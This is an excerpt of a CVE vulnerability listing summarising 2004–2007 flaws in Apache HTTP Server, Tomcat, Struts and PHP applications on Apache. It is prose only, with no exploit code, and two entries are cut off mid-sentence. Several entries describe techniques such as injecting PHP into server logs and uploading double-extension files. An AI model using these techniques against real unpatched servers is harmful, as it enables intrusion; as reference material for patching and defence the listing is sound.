3301| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
3302| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
3303| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
3304| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
3305| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
3306| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
3307| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
3308| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
3309| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
3310| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
3311| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
3312| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
3313| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
3314| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
3315| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
3316| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
3317| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
3318| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
3319| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
3320| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
3321| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
3322| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
3323| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
3324| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
3325| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
3326| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
3327| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
3328| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
3329| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
3330| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
3331| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
3332| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
3333| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
3334| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
3335| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
3336| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
3337| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
3338| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
3339| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
3340| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in Welcome web-app.
3341| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
3342| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
3343| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
3344| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
3345| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
3346| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
3347| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
3348| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
3349| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
3350| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
3351| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
3352| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
3353| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
3354| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
3355| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
3356| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
3357| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
3358| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
3359| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
3360| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
3361| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
3362| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
3363| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
3364| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
3365| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
3366| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
3367| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
3368| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
3369| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
3370| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
3371| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
3372| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
3373| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
3374| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
3375| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
3376| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
3377| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
3378| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
3379| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
3380| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
3381| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
3382| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
3383| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
3384| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
3385| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allow remote attackers to execute arbitrary code via various vectors, including the username.
3386| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
3387| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers to cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
3388| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
3389| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
3390| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
3391| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
3392| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
3393| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
3394| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
3395| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
3396| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
3397| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
3398| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
3399| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
3400| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
3401| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
3402| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
3403| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
3404| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
3405| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
3406| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
3407| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
3408| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
3409| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
3410| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
3411| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
3412| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
3413| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
3414| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
3415| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
3416| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
3417| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
3418| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
3419| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
